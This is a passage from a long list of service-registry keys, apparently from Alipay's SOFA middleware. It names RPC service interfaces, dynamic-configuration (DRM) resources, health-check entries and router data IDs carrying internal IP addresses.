ANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:workflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.PmtRfdAmountSmryHisDAOQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizrecon.facade.BizDataMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.CreditPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.partner.PartnerInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.PhysicalTenantDagSubscribeApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotface.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.icifTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","OLD_CLIENTSERVICE_TEST_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.174.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfcenter.common.service.facade.ApReceiptOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.75.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-ordercore-mrch-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.amc.service.AmcOrgStructureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.engine.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeFundPositionPageInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.prodmng.invest_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebProtocolQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@prodtrans#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.service.facade.insight.FeatureImportanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SALESMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-test5twa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.service.facade.wutong.WutongCondFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.ApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:ALI_MERCHANTCARD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.ssm.UserAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.payerCertValidateRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcore.fee.service.PcreditFeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.RiskMonitorRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilechat_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexRateQueryWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.ProgressTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopPurchaseOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.AuthorityCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.moneyfund.api.MftransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.mng.facade.TemplateMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.market.YebcCampBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.100.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.flowctrl62#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.facade.ExpressCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.ExchangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipGrayResource.notifyReconParamString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.product.spi.Validator:1.0:securityidentify@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PRODUCT_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.app.AppRuleConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.ecf.api.EcftransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsUserServiceInRZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mservicesinspect_antProcessJumpCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.WarnCooperateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:moaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.diagnosis.service.api.PaymentDiagnosisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:jiyun@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.controller.BaseControllerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgengine.core.service.schema.SchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.156.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscommunity.biz.shared.msg.UniformEventPublisherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.wealthdecisionsys.facade.AlarmAnnounceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.community.user.SecuExpertDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.arks.drm.DRMLoadBalanceResource.emaAlphaStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recruitcore.facade.api.material.MaterialTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:inshealthybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTIEP#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mwealthprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ACIAMCONSOLEFXW#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.surrendDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.config.system.SystemParameterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:alphasecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:${filefactory_unique_id}@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.service.riskctrl.api.ChangeRiskCtrlFacade:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.checker.FcloancoreCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.cvm.CaConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.CheckPlatformService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acspcore.common.service.ProductInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitycds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.adaptor.ipay.IPayChangeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.globalSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.operation.OperRecruitEnrollManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.material.CntMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.MbaasDRMImpl.restApichekcSurityKeyDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.apshopcenterTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compmng.service.facade.EsuTaskFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.wufu.WufuTaskSendAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-kbsettle-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.category.StandardCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.inspection.MiniAppInspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpaasweb.common.service.integration.kbdataanalyser.KbdataanalyserServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iriskservice.common.service.model.probe.spi.PrePluginProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pfunddts.common.facade.api.rome.RomeRoadMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ModelQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.sac.StarAgentTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementInconsistentQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:bkfrontweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.MyBankAppInfoFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.57.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProdSaleQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcbenefitcore.facade.service.DiscountPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.48.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.bis.FaceProductFacade:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.poscore.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.search.CodeSearchService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.runner.DebugInterfacePatrolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.118.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finasmcore.common.service.facade.hnv.service.HiNetCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.ossEndSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.globalprod.common.service.facade.GlobalMerchantAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.AlertIndicatorManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.QueryClearBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongmng.presentation.rpc.TestRpcFacade:1.0:600003@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antscheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.brandstory.BrandStoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:enterprise@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.38.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.core.service.eval.service.EvalContentServiceMsg:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.wsexec.facade.WsExecSqlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.DataNodeTypeMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmng.spi.publish.GfmDataPublishFacade:1.0:GFACCCENTER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cp_crowd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IFUNDBOSS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractPerformanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.meta.ServiceMetaTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.TaskUserCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@messagefusion#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.antcommonweal.common.service.facade.project.back.AcwEnterpriseFundBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aks.facade.autoscaler.CapacityLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.close.SysCloseUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.kubernetes.CafeDeploymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:mobilepayfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.systemSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishRecDrmImpl.recInterveneConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.fundmanage.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemigrate.common.service.facade.api.MigrateConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.StandardCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.RuleConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ProdVirtualAntbabyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.dynamiccode.DynamicCodeAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MerchantMccQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.interval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accorderexprod.common.facade.control.api.FundAuthOrderFacade:1.0:antzproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcOrganizationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.usertask.facade.UserTaskActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.banner.BannerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.distributor.ContractBindService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.ResultStatusMapQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelFeatureCopyConfigResource.modelFeatureCopyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanbenefit.common.service.facade.strategy.BenefitStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.buc.acl.api.service.RoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.lend.api.LendApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.approval.ApprovalEngineServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamSearchApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.logAmountCoverageRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revtrans.common.service.facade.api.CompanyInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.136.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.biz.shared.repository.ZdalSequenceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.biz.shared.MinitransTestServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.job.contract.sign.ContractSignOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.biz.shared.component.RecallRcpClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:devicemtnCooperationCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finsupport.common.service.facade.influx.InfluxQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.archimedes.common.service.facade.api.ComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.eindustrycenter.common.service.facade.EindustryAbilityProviderConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.27.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.248.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_customerGrayOpenCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.home.rest.SqlInsertRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_ACCORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.24.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antfinancial.antchain.cloud.endpoint.facade.ProduceTraceabilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.FileAuthenticateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkpaybizcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.staffGraySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_saveEndRemit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.BenefitBackOfficeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.facade.api.TopologyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.FintradeInstSignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.shiva.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopBrandValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.guardian.AccGoldAfterTradeVerifyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.mock.HsMockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.122.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ipromotion.common.service.facade.api.manage.CampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.187.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.biz.drm.TaskFacadeResource.urgent4ISU,version=3.0@DRM#@#DEFAULT_INST